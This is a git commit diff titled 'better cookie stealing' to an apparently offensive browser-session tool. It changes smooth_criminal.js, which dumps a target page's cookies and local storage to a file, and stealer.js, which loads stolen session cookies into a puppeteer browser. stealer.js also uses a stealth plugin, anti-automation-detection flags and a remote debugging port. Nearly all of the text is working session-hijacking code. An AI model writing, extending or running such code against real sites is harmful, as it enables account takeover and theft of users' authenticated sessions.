better cookie stealing

Forrest Kasler · Forrest Kasler · commit a617b972528d · 2024-08-12T20:22:03.000-04:00
diff --git a/.gitignore b/.gitignore
@@ -2,3 +2,4 @@ targets.json
 node_modules
 notes.txt
 user_data/
+*.json
diff --git a/package-lock.json b/package-lock.json
diff --git a/smooth_criminal.js b/smooth_criminal.js
@@ -24,11 +24,11 @@ var target = process.argv[3];
         },
     })
     let local_storage = dom_data.entries
-    console.log({ url: target_page.url(), cookies: cookies, local_storage: local_storage })
+//    console.log({ url: target_page.url(), cookies: cookies, local_storage: local_storage })
     //write the data to a file
     fs.writeFileSync('data.json', JSON.stringify({ url: target_page.url(), cookies: cookies, local_storage: local_storage }))
     //close the page
     await target_page.close();
     //disconnect from the browser
     await browser.disconnect();
-})()
+})()
diff --git a/stealer.js b/stealer.js
@@ -1,5 +1,6 @@
 import puppeteer from 'puppeteer-extra'
 import StealthPlugin from 'puppeteer-extra-plugin-stealth'
+puppeteer.use(StealthPlugin())
 import fs from 'fs';
 
 const default_user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36";
@@ -17,6 +18,7 @@ if(process.argv.length > 3){
     "--disable-blink-features=AutomationControlled",
     "--start-maximized",
     "--no-sandbox",
+    "--remote-debugging-port=9223",
   ]
   if(proxy){
     puppet_options.push("--proxy-server=" + proxy)
@@ -43,10 +45,14 @@ if(process.argv.length > 3){
     delete cookie.partitionKey
   })
   //inject our cookies
-  const cdp = await page.target().createCDPSession();
-  await cdp.send('Network.setCookies',{
-    cookies: session.cookies,
-  })
+  // const cdp = await page.target().createCDPSession();
+  // await cdp.send('Network.setCookies',{
+  //   cookies: session.cookies,
+  // })
+  for (let cookie of session.cookies) {
+    const cdp = await page.target().createCDPSession();
+    await cdp.send('Network.setCookie', cookie).catch((err) => console.log(`error setting cookie on ${cookie}`, err));
+  }
 
   //load the page without JS real quick so that we can inject local storage without interference
   await page.setJavaScriptEnabled(false)
